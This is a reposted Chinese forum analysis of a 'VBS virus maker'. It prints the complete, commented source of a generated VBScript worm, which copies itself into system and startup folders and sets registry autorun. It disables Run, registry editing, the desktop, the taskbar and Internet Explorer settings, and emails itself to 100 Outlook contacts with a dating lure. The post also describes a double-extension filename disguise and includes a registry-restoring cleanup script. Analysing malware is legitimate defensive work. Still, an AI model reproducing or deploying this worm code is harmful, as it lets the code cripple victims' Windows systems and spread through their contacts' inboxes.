[转帖]VBS病毒制造机v1.0 分析报告

警告：此文只是做一些技术性的分析，希望大家不要乱用，造成的任何后果本人概不负责。切记。

病毒制造机，这是网上流行的一款典型的病毒制造机（病毒制造机：顾名思义，就是制造病毒的机器（^_^废话）），用于傻瓜型手工制造vbs病毒（vbs病毒：就是visual basic script即是vb脚本，一种通过microsoft的windows script host提供的一种基于32位windows平台的、与语言无关的脚本解释机制，它使得脚本能够直接在windows桌面或命令提示符下运行。利用wsh，用户能够操纵wsh对象、activex对象、注册表和文件系统。是不是功能强大，怕怕了吧？！）。
这个软件可能是用vb编写（没有询问作者详情），调用了kernel32.dll、user32.dll和advapi32.dll三个系统动态链接库.在这里，kernel32.dll主要用于系统控制，包括进程创建，变量设置，虚拟内存管理，系统资源管理等等，是操作系统必需的库之一。user32.dll主要用于与用户交互的通信，包括messege的传递与echo等。advapi32.dll主要用于程序与系统的api接口，这里即注册表的一些操作，包括regopenkey（取得subkey的handle）,regclosekey（关闭打开或者建立的subkey）,regqueryvalueex（读取指定key的值）。

下面是运行这个制造机（其中提供的功能选择全选，也就是病毒荷载最“狠”化，说白了，就是所有破坏功能都选了，最毒）之后，得到的一个*.vbs脚本病毒(用各大杀毒软件均提示存在vbs.xxxxx病毒)的源代码，加上我的一些注释（改一下名字，比如xxxx.txt .vbs，这里第一和第二后缀名之间n个空格，是不是很迷惑人，以后大家注意防范这样的手段哦（也算一种社会工程吧^_^），就可以发送电子邮件或者其他的方式传播破坏了，您千万不要那样做哦，哈哈！不要做坏蛋！要做好人！）。

on error resume next
set fs=createobject("scripting.filesystemobject") '创建一个能与操作系统沟通的对象,再利用该对象的各种方法对注册表进行操作
set dir1=fs.getspecialfolder(0) '获取windows/winnt文件夹位置
set dir2=fs.getspecialfolder(1) '获取system32/system文件夹位置
set so=createobject("scripting.filesystemobject")
dim r '定义一个变量
set r=createobject("wscript.shell")
so.getfile(wscript.scriptfullname).copy(dir1&"\win32system.vbs") '复制病毒副本到windows/winnt文件夹位置
so.getfile(wscript.scriptfullname).copy(dir2&"\win32system.vbs") '复制病毒副本到system32/system文件夹位置
so.getfile(wscript.scriptfullname).copy(dir1&"\start menu\programs\启动\win32system.vbs") '复制病毒副本到start menu启动菜单

'下面是对注册表的恶意修改和简单的依靠oe传播
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norun",1,"reg_dword" '修改注册表，禁止“运行”菜单
r.regwrite "kcu\software\microsoft\windows\currentversion\policies\explorer\noclose",1,"reg_dword" '修改注册表，禁止“关闭”菜单
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodrives",63000000,"reg_dword" '修改注册表，隐藏所有逻辑盘符
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools",1,"reg_dword" '修改注册表，禁止注册表编辑
r.regwrite "hklm\software\microsoft\windows\currentversion\run\scanregistry","" '修改注册表，禁止开机注册表扫描
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff",1,"reg_dword" '修改注册表，禁止“注销”菜单
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\norealmode",1,"reg_dword" '修改注册表，禁止ms-dos实模式
r.regwrite "hklm\software\microsoft\windows\currentversion\run\win32system","win32system.vbs" '修改注册表，使这个脚本本身开机自动运行
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodesktop",1,"reg_dword" '修改注册表，禁止显示桌面图标
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\disabled",1,"reg_dword" '修改注册表，禁止纯dos模式
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosettaskbar",1,"reg_dword" '修改注册表，禁止“任务栏和开始”菜单
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noviewcontextmenu",1,"reg_dword" '修改注册表，禁止右键菜单
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosetfolders",1,"reg_dword" '修改注册表，禁止控制面板
r.regwrite "hklm\software\classes\.reg\","txtfile" '修改注册表，禁止导入使用.reg文件，改为用txt文件的关联
r.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticecaption","警告" '设置开机提示框标题
r.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticetext","您中vbs脚本病毒了，哭吧~" '设置开机提示框文本内容
set ol=createobject("outlook.application") '创建outlook文件对象用于传播
on error resume next
for x=1 to 100
set mail=ol.createitem(0)
mail.to=ol.getnamespace("mapi").addresslists(1).addressentries(x) '用于向地址簿的前100名发送此 vbs病毒，可以算是简单弱智的蠕虫了吧~~
mail.subject="今晚你来吗？" '邮件主题
mail.body="朋友你好：您的朋友rose给您发来了热情的邀请。具体情况请阅读随信附件，祝您好运！ 同城约会网" '邮件内容
mail.attachments.add(dir2&"win32system.vbs")
mail.send
next
ol.quit

'下面是对internet explore 选项的恶意修改
r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsercontextmenu",1,"reg_dword" '修改注册表，禁止鼠标右键
r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowseroptions",1,"reg_dword" '修改注册表，禁止internet选项
r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsersaveas",1,"reg_dword" '修改注册表，禁止“另存为”
r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nofileopen",1,"reg_dword" '修改注册表，禁止“文件/打开”菜单
r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\advanced",1,"reg_dword" '修改注册表，禁止更改高级页设置
r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\cache internet",1,"reg_dword" '修改注册表，禁止更改临时文件设置
r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\autoconfig",1,"reg_dword" '修改注册表，禁止更改自动配置
r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\homepage",1,"reg_dword" '修改注册表，禁止更改主页，即“主页”变灰
r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\history",1,"reg_dword" '修改注册表，禁止更改历史记录设置
r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\connwiz admin lock",1,"reg_dword" '修改注册表，禁止更改internet连接向导
r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\securitytab",1,"reg_dword" '修改注册表，禁止更改安全项
r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\resetwebsettings",1,"reg_dword" '修改注册表，禁止“重置web设置”
r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\noviewsource",1,"reg_dword" '修改注册表，禁止查看源文件
r.regwrite "hkcu\software\policies\microsoft\internet explorer\infodelivery\restrictions\noaddingsubscriptions",1,"reg_dword" '修改注册表，禁止添加脱机计划
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nofilemenu",1,"reg_dword" '修改注册表，禁止“文件”菜单

下面就是作者提供的“解药”--恢复文件reset.vbs的源代码：
（由于这里与上面的病毒破坏恶意修改恰好相反，故不做注释了）

set fs=createobject("scripting.filesystemobject")
set dir1=fs.getspecialfolder(0)
set dir2=fs.getspecialfolder(1)
set so=createobject("scripting.filesystemobject")
dim r
set r=createobject("wscript.shell")
r.regwrite "hklm\software\microsoft\windows\currentversion\runonce\deltree.exe","start.exe /m deltree /y "&dir1&"\win32system.vbs"
r.regwrite "hklm\software\microsoft\windows\currentversion\runonce\deltree.exe","start.exe /m deltree /y "&dir2&"\win32system.vbs"
r.regwrite "hklm\software\microsoft\windows\currentversion\runonce\deltree.exe","start.exe /m deltree /y "&dir1&"\start menu\programs\启动\win32system.vbs"
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norun",0,"reg_dword"
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noclose",0,"reg_dword"
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodrives",0,"reg_dword"
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools",0,"reg_dword"
r.regwrite "hklm\software\microsoft\windows\currentversion\run\scanregistry","scanregw.exe /autorun"
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff",0,"reg_dword"
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\norealmode",0,"reg_dword"
r.regwrite "hklm\software\microsoft\windows\currentversion\run\win32system",""
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodesktop",0,"reg_dword"
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\disabled",0,"reg_dword"
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosettaskbar",0,"reg_dword"
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noviewcontextmenu",0,"reg_dword"
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosetfolders",0,"reg_dword"
r.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticecaption",""
r.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticetext",""
r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsercontextmenu",0,"reg_dword"
r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowseroptions",0,"reg_dword"
r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsersaveas",0,"reg_dword"
r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nofileopen",0,"reg_dword"
r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\advanced",0,"reg_dword"
r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\cache internet",0,"reg_dword"
r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\autoconfig",0,"reg_dword"
r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\homepage",0,"reg_dword"
r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\history",0,"reg_dword"
r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\connwiz admin lock",0,"reg_dword"
r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\securitytab",0,"reg_dword"
r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\resetwebsettings",0,"reg_dword"
r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\noviewsource",0,"reg_dword"
r.regwrite "hkcu\software\policies\microsoft\internet explorer\infodelivery\restrictions\noaddingsubscriptions",0,"reg_dword"
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nofilemenu",0,"reg_dword"

通过以上的分析，大家是不是觉得vbs病毒实在太简单了，的确这样：vbs蠕虫就是这么一回事。但是这个病毒制造机出的病毒算是很菜鸟级了，因为其恐怖的破坏功能，实在让人为它捏了一把冷汗，纵使再高的高手，注册表遭遇这么严重的创伤，不重做系统才怪（否则只能说明他/她的耐心实在能让人肃然起敬￥#￥）。所以这个病毒只是太坏了，太狠了。技术性的东西实在没有多少，没有什么新意。从传染性和隐藏性来看也是很一般般。
最后再次严正申明请不要去做非法的事，小心“白帽子”请你喝茶。
纯粹的技术研究值得提倡。
ps:以上分析不当之处，敬请指正，谢谢.

对程序不太懂啊

恩,我好是呀~